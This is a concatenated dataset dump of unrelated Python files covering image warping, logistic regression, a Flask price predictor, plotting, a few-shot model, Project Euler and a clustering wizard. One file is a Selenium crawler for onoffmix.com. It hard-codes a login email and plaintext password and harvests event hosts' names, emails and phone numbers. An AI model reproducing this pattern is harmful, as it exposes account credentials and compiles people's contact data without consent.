img\n img2 = img.copy()\n img2 = cv2.merge((img2, img2, img2))\n for i, pt in enumerate(pts):\n cv2.drawMarker(img2,\n pt,\n color=colors[i],\n markerType=cv2.MARKER_CROSS,\n markerSize=params.marker_size*res_ratio_i,\n thickness=params.line_thickness*res_ratio_i)\n\n # temp rgb image for colored markers on refimg\n refimg2 = refimg.copy()\n if len(shape_ref) == 2:\n refimg2 = cv2.merge((refimg2, refimg2, refimg2))\n for i, pt in enumerate(refpts):\n cv2.drawMarker(refimg2,\n pt,\n color=colors[i],\n markerType=cv2.MARKER_CROSS,\n markerSize=params.marker_size*res_ratio_r,\n thickness=params.line_thickness*res_ratio_r)\n\n debug_mode = params.debug\n params.debug = None\n img_blend = overlay_two_imgs(warped_img, refimg)\n params.debug = debug_mode\n\n if params.debug == 'plot':\n plot_image(img2)\n plot_image(refimg2)\n plot_image(img_blend)\n if params.debug == 'print':\n print_image(img2, os.path.join(params.debug_outdir, str(params.device) + \"_img-to-warp.png\"))\n print_image(refimg2, os.path.join(params.debug_outdir, str(params.device) + \"_img-ref.png\"))\n print_image(img_blend, os.path.join(params.debug_outdir, str(params.device) + \"_warp_overlay.png\"))\n\n return warped_img\n","sub_path":"src/LivestockCV/core/transform/warp.py","file_name":"warp.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"184823251","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn\nfrom sklearn.preprocessing import minmax_scale\n\n\ndef sigmoid(x):\n return 1.0 / (1 + np.exp(-x))\n\n\ndef loss_func(y, pred):\n return (-y * np.log(pred) - (1 - y) * np.log(1 - pred)).sum()\n\n\ndef grad_func(X, y, pred):\n return X.T @ (pred - y) / y.size\n\n\ndef accuracy_score(X, y, w):\n pred = sigmoid(np.dot(X, w))\n pred[pred >= 0.5] = 1\n pred[pred < 0.5] = 0\n acc = np.sum(pred == y) / y.size\n return acc\n\n\ndef logistic_L2(X, y, alpha=1e-1, lambda_cofee=1e-2, max_iter=2000, eps=1e-4):\n # data num\n N = X.shape[0]\n # feature num\n d = X.shape[1]\n # init w\n w = np.ones(X.shape[1])\n # history\n acc_his = []\n loss_his = []\n grad_his = []\n for i in range(int(max_iter)):\n acc = accuracy_score(X, y, w)\n pred = sigmoid(np.dot(X, w))\n loss = loss_func(y, pred)\n grad = grad_func(X, y, pred)\n # convergence?\n if np.linalg.norm(grad) < eps:\n break\n # recored history\n acc_his.append(acc)\n loss_his.append(loss)\n grad_his.append(np.linalg.norm(grad))\n\n # update w\n w = w + alpha / N * ((y - (sigmoid(X @ w))) @ X)\n # L2\n w = w - alpha * lambda_cofee * w\n fig, ax = plt.subplots(3, figsize=(13, 13))\n ax[0].set_title('Accurary')\n ax[0].plot(acc_his)\n ax[1].set_title('Loss')\n ax[1].plot(loss_his)\n ax[2].set_title('GradNorm')\n ax[2].plot(grad_his)\n plt.show()\n return w\n\n\nif __name__ == '__main__':\n # Load\n X_train = pd.read_csv('pa2_train_X.csv')\n y_train = pd.read_csv('pa2_train_y.csv')\n X_val = pd.read_csv('pa2_dev_X.csv')\n y_val = pd.read_csv('pa2_dev_y.csv')\n features = X_train.columns\n\n # Preprocessing\n X_train[['Age', 'Annual_Premium', 'Vintage']] = minmax_scale(X_train[['Age', 'Annual_Premium', 'Vintage']])\n X_val[['Age', 'Annual_Premium', 'Vintage']] = minmax_scale(X_val[['Age', 'Annual_Premium', 'Vintage']])\n X_train = X_train.to_numpy()\n y_train = y_train.to_numpy()\n X_val = X_val.to_numpy()\n y_val = y_val.to_numpy()\n y_train = y_train.squeeze()\n y_val = y_val.squeeze()\n\n # different lambda\n w0 = logistic_L2(X_train, y_train, lambda_cofee=0)\n w1 = logistic_L2(X_train, y_train, lambda_cofee=1e-1)\n w2 = logistic_L2(X_train, y_train, lambda_cofee=1e-2)\n w3 = logistic_L2(X_train, y_train, lambda_cofee=1e-3)\n w4 = logistic_L2(X_train, y_train, lambda_cofee=1e-4)\n w5 = logistic_L2(X_train, y_train, lambda_cofee=1e-5)\n\n # metirc\n w0_train_acc = accuracy_score(X_train, y_train, w0)\n w0_val_acc = accuracy_score(X_val, y_val, w0)\n w1_train_acc = accuracy_score(X_train, y_train, w1)\n w1_val_acc = accuracy_score(X_val, y_val, w1)\n w2_train_acc = accuracy_score(X_train, y_train, w2)\n w2_val_acc = accuracy_score(X_val, y_val, w2)\n w3_train_acc = accuracy_score(X_train, y_train, w3)\n w3_val_acc = accuracy_score(X_val, y_val, w3)\n w4_train_acc = accuracy_score(X_train, y_train, w4)\n w4_val_acc = accuracy_score(X_val, y_val, w4)\n w5_train_acc = accuracy_score(X_train, y_train, w5)\n w5_val_acc = accuracy_score(X_val, y_val, w5)\n\n train_acc = [w0_train_acc, w1_train_acc, w2_train_acc, w3_train_acc, w4_train_acc, w5_train_acc]\n val_acc = [w0_val_acc, w1_val_acc, w2_val_acc, w3_val_acc, w4_val_acc, w5_val_acc]\n labels = ['1e0', '1e-1', '1e-2', '1e-3', '1e-4', '1e-5']\n w_list = [w0, w1, w2, w3, w4, w5]\n\n # plot\n x = np.arange(len(labels)) # the label locations\n width = 0.35 # the width of the bars\n\n fig, ax = plt.subplots(figsize=(12, 12))\n ax.bar(x - width / 2, train_acc, width, label='TrainSetAcc')\n ax.bar(x + width / 2, val_acc, width, label='ValSetAcc')\n ax.set_ylabel('Accuracy')\n ax.set_ylim(0.75, 0.8)\n ax.set_title('Accuracy of Train and Val with L2')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend()\n\n plt.show()\n\n # sorted features\n sorted_features = features[np.argsort(np.abs(w_list[np.argmax(val_acc)]))[::-1]]\n # top 5\n print(sorted_features[:5])\n # zero num\n print(np.sum(np.abs(w_list[np.argmax(val_acc)]) < 1e-6))\n","sub_path":"Logistic regression/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"613781263","text":"from flask import Flask, render_template, request,url_for\nimport requests\nimport pickle\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import StandardScaler\napp = Flask(__name__)\nmodel_filename = \"RFmodel.pkl\"\nmodel = pickle.load(open(model_filename, 'rb'))\n\n@app.route('/',methods=['GET'])\ndef hello():\n return render_template('homepage.html')\n\n@app.route('/calc_price',methods=['POST'])\ndef calc_price():\n if request.method == \"POST\":\n yrs_old = int(request.form['car_age'])\n Present_Price = float(request.form['ori_price'])\n Kms_Driven = int(request.form['kms_driven'])\n Owner = request.form['owner_type']\n if (Owner == \"First hand\"):\n Owner = 0\n elif (Owner == \"Second_hand\"):\n Owner = 1\n else:\n Owner = 3\n Fuel_Type_Petrol = request.form['fuel_type']\n if (Fuel_Type_Petrol == \"Petrol\"):\n Fuel_Type_Petrol = 1\n else:\n Fuel_Type_Petrol = 0\n Seller_Type_Individual = request.form['seller_type']\n if (Seller_Type_Individual == \"Individual\"):\n Seller_Type_Individual = 1\n else:\n Seller_Type_Individual = 0\n Transmission_Manual = request.form['seller_type']\n if (Transmission_Manual == \"Manual\"):\n Transmission_Manual = 1\n else:\n Transmission_Manual = 0\n\n prediction=model.predict([[Present_Price,Kms_Driven,Owner,yrs_old,Fuel_Type_Petrol,Seller_Type_Individual,Transmission_Manual]])\n output=round(prediction[0],2)\n if output<0:\n return render_template('result.html',prediction_texts=\"Sorry you cannot sell this car\")\n else:\n return render_template('result.html',prediction_text=\"You Can Sell your car for {} Lakhs\".format(output))\n else:\n return render_template('result.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"70331501","text":"from src.simulation import simulate_pop\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom matplotlib import cm\n\n\ndef show_multiple_gen_paths(gen_tracked_paths):\n \"\"\"Plots paths for multiple generations.\n\n Creates 5 plots evenly spaced across the selected evolution, such that the first and last generation is included.\n Plots show tracked paths for each individual as seen from on top.\n\n Parameters\n ----------\n gen_tracked_paths : list\n Tracker for multiple generations.\n \"\"\"\n\n # show paths for multiple generations\n coord_max = 0\n\n # find maximum coordinate for axis scaling\n for tracked_paths in gen_tracked_paths:\n for key in tracked_paths.keys():\n tracked_path = np.asarray(tracked_paths[key])\n if np.max(np.abs(tracked_path)) > coord_max:\n coord_max = np.max(np.abs(tracked_path))\n\n # ensure enough generations to be split in 5 plots\n if len(gen_tracked_paths) > 4:\n gens = list(range(0, len(gen_tracked_paths), int(len(gen_tracked_paths) / 5)))\n else:\n gens = list(range(len(gen_tracked_paths)))\n\n # ensure last generation is displayed\n if not gens[-1] == (len(gen_tracked_paths) - 1):\n gens += [len(gen_tracked_paths) - 1]\n\n # set plotting title according to selected or index\n for idx, tracked_paths in enumerate([gen_tracked_paths[gen] for gen in gens]):\n if gens is not None:\n gen = gens[idx]\n else:\n gen = idx\n\n # perform plotting\n show_path(tracked_paths, coord_max * 1.1, title='paths of gen {}'.format(gen))\n\n\ndef show_path(tracked_paths, ax_lim=None, title='paths of individuals'):\n \"\"\"Show tracked path for single (multicolored) or multiple (one color per individual) individuals.\n\n Plots the tracked path for selected individuals. If only one individual was selected, a multicolored line indicates\n the progress of the selected individual. If multiple individuals were selected, a new color will be assigned to each\n individual.\n\n Parameters\n ----------\n tracked_paths : dict\n Tracker for one generation. Each key is a different individual.\n ax_lim : float | int\n Axis limit +- selected value.\n title : str\n Plot title.\n \"\"\"\n # show paths for one generation\n plt.figure()\n plt.gcf().set_facecolor('black')\n\n # iterate over individuals\n for key in tracked_paths.keys():\n tracked_path = np.asarray(tracked_paths[key])\n\n if len(tracked_paths) > 1:\n plt.plot(tracked_path[:, 0], tracked_path[:, 1])\n plt.scatter(tracked_path[0, 0], tracked_path[0, 1])\n plt.title(title, color='white')\n else:\n c_map = cm.get_cmap('viridis', 255)(np.linspace(0, 1, len(tracked_path)))[:, 0:3]\n for data_point in range(len(tracked_path) - 1):\n plt.plot(tracked_path[data_point:(data_point + 2), 0], tracked_path[data_point:(data_point + 2), 1],\n color=c_map[data_point, :])\n plt.title('path of individual', color='white')\n\n plt.scatter(tracked_path[-1, 0], tracked_path[-1, 1], color='yellow')\n plt.scatter(tracked_path[0, 0], tracked_path[0, 1], color='white')\n plt.gca().set_facecolor('black')\n plt.gca().spines['bottom'].set_color('white')\n plt.gca().spines['top'].set_color('white')\n plt.gca().spines['left'].set_color('white')\n plt.gca().spines['right'].set_color('white')\n plt.gca().xaxis.label.set_color('white')\n plt.gca().tick_params(axis='x', colors='white')\n plt.gca().yaxis.label.set_color('white')\n plt.gca().tick_params(axis='y', colors='white')\n plt.ylabel('y coordinate')\n plt.xlabel('x coordinate')\n if ax_lim is not None:\n plt.xlim((-ax_lim, ax_lim))\n plt.ylim((-ax_lim, ax_lim))\n plt.gca().set_aspect('equal', 'box')\n plt.show()\n\n\ndef show_stats(stats):\n \"\"\"Plots statistics for average and best performance over generations.\n\n Parameters\n ----------\n stats : list | np.array\n Statistics over generations.\n \"\"\"\n\n # show summary of fitness over all generations (average and best performer)\n stats = np.asarray(stats)\n plt.figure()\n plt.subplot(121)\n plt.plot(stats[:, 0], stats[:, 1])\n plt.xlabel('generation')\n plt.ylabel('fitness')\n plt.title('average performance over generations')\n\n plt.subplot(122)\n plt.plot(stats[:, 0], stats[:, 3])\n plt.xlabel('generation')\n plt.title('best performance over generations')\n plt.show()\n\n\ndef show_individual(gene_pool, evo_config, args):\n \"\"\"Renders a GUI based simulation for selected individuals.\n\n Displays a viewable simulation of all individuals in ``gene_pool``.\n\n Parameters\n ----------\n gene_pool : list\n List of genomes for all individuals. Created using :func:`src.IO.new_gene_pool`.\n evo_config : dict\n Configuration file for the current simulation. See :func:`src.IO.make_default_evo_config`.\n args : argparse.Namespace\n Parsed arguments.\n \"\"\"\n\n # show desired simulation\n return simulate_pop(gene_pool, evo_config, args, track_individuals=True, direct=False)\n","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"380224871","text":"import torch.nn as nn\n\n\n\"\"\" Optional conv block \"\"\"\ndef conv_block(in_channels, out_channels):\n\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.MaxPool2d(2)\n )\n\n\n\"\"\" Define your own model \"\"\"\nclass FewShotModel(nn.Module):\n def __init__(self, x_dim=3, hid_dim=64, z_dim=64):\n super(FewShotModel, self).__init__()\n self.encoder = nn.Sequential(\n conv_block(x_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, z_dim),\n )\n\n self.fc = nn.Sequential(\n nn.Linear(64 * 20 * 20, 1024),\n )\n\n def forward(self, x):\n # embedding_vector = self.encoder(x)\n out = self.encoder(x)\n dim = 1\n for d in out.size() [1:]:\n dim = dim*d\n out = out.view(-1, dim)\n embedding_vector = self.fc(out)\n return embedding_vector\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292808158","text":"\n#%%\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom bs4 import BeautifulSoup\nimport requests\nimport numpy as np\nimport pandas as pd\nimport os\nimport time\n\n#os.chdir('/Users/hj/dev/meetup_crawl')\n#os.getcwd()\nprint(os.getcwd())\n\n#%%\n#phantomJS 실행\ndriver = webdriver.PhantomJS('./enviroments/phantomjs-2.1.1-macosx/bin/phantomjs')\n\n\n#%%\n#페이지 로드 대기시간 설정\ndriver.implicitly_wait(5)#웹 자원 로드를 위해 5초까지 기다림.\ndriver.set_script_timeout(5)\n\n\n#%%\n#baseURL\nbase_URL = 'https://www.onoffmix.com' #온오프믹스\ndriver.get(base_URL+'/account/login') #get 로그인 페이지\n\n#%%\n#로그인\ndriver.find_element_by_class_name('email').send_keys('kimzombie@hotmail.com')\ndriver.find_element_by_class_name('password').send_keys('asdf65851242!@')\n\ndriver.find_element_by_class_name('btn_submit').click()\n\ntry:\n WebDriverWait(driver, 10).until(\n EC.presence_of_all_elements_located((By.CLASS_NAME, \"user_name\")))\nexcept:\n print('error')\n\n#%%\n#time.sleep(1)\n\n#교육 페이지로 이동\ndriver.get(base_URL+'/event/main/?c=085')\n\n#최근순으로 이동\nrecent_selector = '#content > div > section.event_main_area > div.title_bar > ul.sort_menu > li:nth-child(2) > a'\ndriver.find_element_by_css_selector(recent_selector).click()\n\n\n#%% [markdown]\n# #페이지이동\n# #driver.find.element_by_ccs_selector()\n# \n# #content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(3)\n# #content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(4)\n# \n# '#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_prev'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a.page_move.active.disabled'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(3)'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(4)'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(5)'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(6)'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_next'\n\n#%%\n#각 교육 상세 페이지 URL 추출 함수 지정\ndef getURL():\n temp_URL = []\n move = ['3', '4', '5', '6'] # 각 selector 선택을 위한 변수\n for v in move:\n #time.sleep(1)\n\n try:\n WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child('+v+')')))\n #print(v)\n except:\n print('error')\n\n html = driver.page_source\n list_soup = BeautifulSoup(html, 'html.parser')\n list_selector = '#content > div > section.event_main_area > ul > li > article > a'\n selected = list_soup.select(list_selector)\n #print(1)\n #print(selected)\n #print(list_soup.select(list_selector))\n \n #각 타겟 페이지 URL추출\n for i in selected:\n temp_URL.append(i.get(\"href\"))\n #print(i.get(\"href\"))\n\n \n \n #다음페이지로 이동\n driver.find_element_by_css_selector('#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child('+v+')').click()\n #print(v)\n return temp_URL\n\n\n#%%\n#각 교육 상세 페이지 URL 추출\ntarget_URL = []\nepoch = 1\nfor i in range(epoch):\n try:\n WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_next')))\n except:\n print('error')\n target_URL = target_URL + getURL()\n \n driver.find_element_by_css_selector('#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_next').click()\n\n#len(target_URL)\n\n\n#%%\n#광고 페이지 제거 - /cs/를 포함하면 광고\ncs = []\nfor n in target_URL:\n cs.append(n.find(\"/cs/\"))\n\n \ndel target_URL[cs.index(0)]\ntarget_URL\n\n\n#%%\n#selector들\n#제목\ntitle_selector = '#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > h3'\n#모임기간\ndate_selector = \"#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > ul > li:nth-child(1) > p\"\n#모임장소\nplace_selector = \"#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > ul > li:nth-child(2) > p > span\"\n#모집정원\nlimitation_selector = '#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > ul > li:nth-child(3) > p > span.total > span'\n#강연자 이름\nname_selector =\"#hostInfo > li.host_name > a\"\n#강연자 email\nemail_selector = \"#hostInfo > li.host_mail\"\n#강연자 전화번호\nphone_selector =\"#hostInfo > li.host_phone\"\n\n\n#%%\n#csv파일이 존재하는지 확인하고 없으면 폴더 및 csv파일 생성\nif os.path.exists('./data/onoffmix_data.csv'):\n old_data = pd.read_csv('./data/onoffmix_data.csv', index_col=0)\nelse:\n if not os.path.exists('./data'):\n os.mkdir('./data/')\n \n df = pd.DataFrame(columns=['이름', '연락처', '이메일', '제목', '장소', '시간', '인원제한', 'URL'])\n df.to_csv('./data/onoffmix_data.csv')\n old_data = pd.read_csv('./data/onoffmix_data.csv', index_col=0)\n\n\n \n\n#%%\nname_list = []\nlimitation_list = []\nplace_list = []\ndate_list = []\ntitle_list = []\nemail_list = []\nphone_list = []\nurl_list = []\nfor i in target_URL:\n \n #타겟 URL지정해서 get\n driver.get(base_URL+i)\n #time.sleep(0.5)\n \n\n #soup 타겟 페이지\n target_html = driver.page_source\n target_soup = BeautifulSoup(target_html, 'html.parser')\n #target_soup\n\n #soup에서 요소들 추출해서 list로 저장\n url_list.append(base_URL+i)\n\n title_selected = target_soup.select(title_selector)\n if 0 < len(title_selected) :\n title_list.append(title_selected[0].text[21:-16])\n print(title_selected[0].text[21:-16])\n else:\n title_list.append('no_title')\n print('no_title')\n\n\n date_selected = target_soup.select(date_selector)\n if 0 < len(date_selected):\n date_list.append(date_selected[0].text)\n print(date_selected[0].text)\n else:\n date_list.append('no_date')\n print('no_date')\n\n place_selected = target_soup.select(place_selector)\n if 0 < len(place_selected):\n place_list.append(place_selected[0].text)\n print(place_selected[0].text)\n else:\n place_list.append('no_place')\n print('no_place')\n\n limitation_selected = target_soup.select(limitation_selector)\n if 0 < len(limitation_selected):\n limitation_list.append(limitation_selected[0].text)\n print(limitation_selected[0].text)\n else: \n limitation_list.append('no_limitation')\n print('no_limitation')\n\n name_selected = target_soup.select(name_selector)\n if 0 < len(name_selected):\n name_list.append(name_selected[0].text)\n print(name_selected[0].text)\n else:\n name_list.append('no_name')\n print('no_name')\n\n email_selected = target_soup.select(email_selector)\n if 0 < len(email_selected):\n email_list.append(email_selected[0].text)\n print(email_selected[0].text)\n else:\n email_list.append('no_email')\n print('no_email')\n\n phone_selected = target_soup.select(phone_selector)\n if 0 < len(phone_selected):\n phone_list.append(phone_selected[0].text)\n print(phone_selected[0].text)\n else:\n phone_list.append('no_phone')\n print('no_phone')\n\n\n\n#%%\n#데이터 추가\nnew_data = pd.DataFrame({'이름':name_list, '연락처':phone_list, '이메일':email_list, '제목':title_list, '장소':place_list, '시간':date_list, '인원제한':limitation_list, 'URL':url_list})\nresult_data = old_data.append(new_data, ignore_index=True)\n\n#중복항목 제거\nresult_data.drop_duplicates(subset='URL', inplace=True)\n\n#파일로 내보내기\nresult_data.to_csv(os.getcwd() + '/data/onoffmix_data.csv')\nprint('onoffmix_data.csv')\n\n#%%\ndriver.quit()\n\n\n\n\n#%%\nprint('name:' , len(name_list))\nprint('phone:', len(phone_list))\nprint('email:', len(email_list))\nprint('title:', len(title_list))\nprint('place:', len(place_list))\nprint('date:', len(date_list))\nprint('limit:', len(limitation_list))\nprint('URL:', len(url_list))","sub_path":"onoffmix_crawl_P.py","file_name":"onoffmix_crawl_P.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607366181","text":"'''\n\nLet d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).\nIf d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and each of a and b are called amicable numbers.\n\nFor example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.\n\nEvaluate the sum of all the amicable numbers under 10000.\n\n'''\n\ndef getSomeOfDivisors(n):\n\tsumDivisors = 1\n\tfor i in range(2,int(n**0.5)+1):\n\t\tif n % i == 0:\n\t\t\tsumDivisors += i\n\t\t\tsumDivisors += n / i\n\t\t\tif i**2 == n:\n\t\t\t\tsumDivisors -= i\n\treturn sumDivisors\n\n\n\n\ndef getAmicable(N):\n\tdone = {}\n\tamicableNumbers = []\n\tfor i in range(2,N):\n\t\tdone[i] = False\n\tfor number in range(2,N):\n\t\tif not done[number]:\n\t\t\tsumDivisors1 = getSomeOfDivisors(number)\n\t\t\tdone[number] = True\n\t\t\tif sumDivisors1 == 1:\n\t\t\t\tcontinue\n\t\t\tif sumDivisors1 >= N:\n\t\t\t\tcontinue\n\t\t\tif not done[sumDivisors1]:\n\t\t\t\tsumDivisors2 = getSomeOfDivisors(sumDivisors1)\n\t\t\t\tif number == sumDivisors2:\n\t\t\t\t\tamicableNumbers.append(sumDivisors1)\n\t\t\t\t\tamicableNumbers.append(sumDivisors2)\n\treturn amicableNumbers\n\n\nif __name__ == '__main__':\n\tprint(sum(getAmicable(10000)))","sub_path":"Problem21.py","file_name":"Problem21.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"148802304","text":"import cv2\nfrom matplotlib import pyplot as plt\n\n\ndef showImage(img):\n \"\"\"\n Showing image twice using cv2\n :param img:\n \"\"\"\n if not isinstance(img, str) or len(img) < 3:\n return None\n\n # cv2 load img and show\n img = cv2.imread(img)\n cv2.imshow('frame', img)\n\n \"\"\" Show img in plt \"\"\"\n plt.figure()\n plt.axis(\"off\")\n plt.imshow(img[:, :, ::-1])\n plt.show()\n","sub_path":"Classwork3/showImage.py","file_name":"showImage.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"81352362","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Wizard.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport os.path as op\nfrom operator import itemgetter\n\nfrom ...utils import _is_array_like\nfrom .view_models import HTMLClusterViewModel\nfrom ...gui._utils import _read\n\n\n#------------------------------------------------------------------------------\n# Utility functions\n#------------------------------------------------------------------------------\n\ndef _argsort(seq, reverse=True, n_max=None):\n \"\"\"Return the list of clusters in decreasing order of value from\n a list of tuples (cluster, value).\"\"\"\n out = [cl for (cl, v) in sorted(seq,\n key=itemgetter(1),\n reverse=reverse)]\n if n_max in (None, 0):\n return out\n else:\n return out[:n_max]\n\n\ndef _best_clusters(clusters, quality, n_max=None):\n return _argsort([(cluster, quality(cluster))\n for cluster in clusters], n_max=n_max)\n\n\ndef _find_first(items, filter=None):\n if not items:\n return None\n if filter is None:\n return items[0]\n return next(item for item in items if filter(item))\n\n\ndef _previous(items, current, filter=None):\n if current not in items:\n raise RuntimeError(\"{0} is not in {1}.\".format(current, items))\n i = items.index(current)\n if i == 0:\n return current\n try:\n return _find_first(items[:i][::-1], filter)\n except StopIteration:\n return current\n\n\ndef _next(items, current, filter=None):\n if not items:\n return current\n if current not in items:\n raise RuntimeError(\"{0} is not in {1}.\".format(current, items))\n i = items.index(current)\n if i == len(items) - 1:\n return current\n try:\n return _find_first(items[i + 1:], filter)\n except StopIteration:\n return current\n\n\ndef _progress(value, maximum):\n if maximum <= 1:\n return 1\n return int(100 * value / float(maximum - 1))\n\n\n#------------------------------------------------------------------------------\n# Wizard\n#------------------------------------------------------------------------------\n\nclass Wizard(object):\n \"\"\"Propose a selection of high-quality clusters and merge candidates.\"\"\"\n def __init__(self, cluster_groups=None):\n self.cluster_groups = cluster_groups\n self.reset()\n\n def reset(self):\n self._best_list = [] # This list is fixed (modulo clustering actions).\n self._match_list = [] # This list may often change.\n self._similarity = None\n self._quality = None\n self._best = None\n self._match = None\n\n @property\n def has_started(self):\n return len(self._best_list) > 0\n\n # Quality functions\n #--------------------------------------------------------------------------\n\n def set_similarity_function(self, func):\n \"\"\"Register a function returning the similarity between two clusters.\n\n Can be used as a decorator.\n\n \"\"\"\n self._similarity = func\n return func\n\n def set_quality_function(self, func):\n \"\"\"Register a function returning the quality of a cluster.\n\n Can be used as a decorator.\n\n \"\"\"\n self._quality = func\n return func\n\n # Internal methods\n #--------------------------------------------------------------------------\n\n def _group(self, cluster):\n return self._cluster_groups.get(cluster, None)\n\n def _in_groups(self, items, groups):\n \"\"\"Filter out ignored clusters or pairs of clusters.\"\"\"\n if not isinstance(groups, (list, tuple)):\n groups = [groups]\n return [item for item in items if self._group(item) in groups]\n\n def _is_not_ignored(self, cluster):\n return self._in_groups([cluster], (None, 'good'))\n\n def _check(self):\n clusters = set(self.cluster_ids)\n assert set(self._best_list) <= clusters\n assert set(self._match_list) <= clusters\n if self._best is not None and len(self._best_list) >= 1:\n assert self._best in self._best_list\n if self._match is not None and len(self._match_list) >= 1:\n assert self._match in self._match_list\n if None not in (self.best, self.match):\n assert self.best != self.match\n\n def _sort(self, items, mix_good_unsorted=False):\n \"\"\"Sort clusters according to their groups:\n unsorted, good, and ignored.\"\"\"\n if mix_good_unsorted:\n return (self._in_groups(items, (None, 'good')) +\n self._in_groups(items, 'ignored'))\n else:\n return (self._in_groups(items, None) +\n self._in_groups(items, 'good') +\n self._in_groups(items, 'ignored'))\n\n # Properties\n #--------------------------------------------------------------------------\n\n @property\n def cluster_ids(self):\n \"\"\"Array of cluster ids in the current clustering.\"\"\"\n return sorted(self._cluster_groups)\n\n @property\n def cluster_groups(self):\n \"\"\"Dictionary with the groups of each cluster.\n\n The groups are: `None` (corresponds to unsorted), `good`, or `ignored`.\n\n \"\"\"\n return self._cluster_groups\n\n @cluster_groups.setter\n def cluster_groups(self, cluster_groups):\n # cluster_groups is a dictionary or is converted to one.\n if _is_array_like(cluster_groups):\n # A group can be None (unsorted), `good`, or `ignored`.\n cluster_groups = {clu: None for clu in cluster_groups}\n self._cluster_groups = cluster_groups\n\n # Core methods\n #--------------------------------------------------------------------------\n\n def best_clusters(self, n_max=None, quality=None):\n \"\"\"Return the list of best clusters sorted by decreasing quality.\n\n The default quality function is the registered one.\n\n \"\"\"\n if quality is None:\n quality = self._quality\n best = _best_clusters(self.cluster_ids, quality, n_max=n_max)\n return self._sort(best)\n\n def most_similar_clusters(self, cluster=None, n_max=None, similarity=None):\n \"\"\"Return the `n_max` most similar clusters to a given cluster.\n\n The default similarity function is the registered one.\n\n \"\"\"\n if cluster is None:\n cluster = self.best\n if cluster is None:\n cluster = self.best_clusters(1)[0]\n if similarity is None:\n similarity = self._similarity\n s = [(other, similarity(cluster, other))\n for other in self.cluster_ids\n if other != cluster]\n clusters = _argsort(s, n_max=n_max)\n return self._sort(clusters, mix_good_unsorted=True)\n\n # List methods\n #--------------------------------------------------------------------------\n\n def _set_best_list(self, cluster=None, clusters=None):\n if cluster is None:\n cluster = self.best\n if clusters is None:\n clusters = self.best_clusters()\n self._best_list = clusters\n if clusters:\n self.best = clusters[0]\n\n def _set_match_list(self, cluster=None, clusters=None):\n if cluster is None:\n cluster = self.best\n if clusters is None:\n clusters = self.most_similar_clusters(cluster)\n self._match_list = clusters\n if clusters:\n self.match = clusters[0]\n\n @property\n def best(self):\n \"\"\"Currently-selected best cluster.\"\"\"\n return self._best\n\n @best.setter\n def best(self, value):\n assert value in self._best_list\n self._best = value\n\n @property\n def match(self):\n \"\"\"Currently-selected closest match.\"\"\"\n return self._match\n\n @property\n def selection(self):\n \"\"\"Return the current best/match cluster selection.\"\"\"\n b, m = self.best, self.match\n if b is None:\n return []\n elif m is None:\n return [b]\n else:\n if b == m:\n return [b]\n else:\n return [b, m]\n\n @match.setter\n def match(self, value):\n if value is not None:\n assert value in self._match_list\n self._match = value\n\n @property\n def best_list(self):\n \"\"\"Current list of best clusters, by decreasing quality.\"\"\"\n return self._best_list\n\n @property\n def 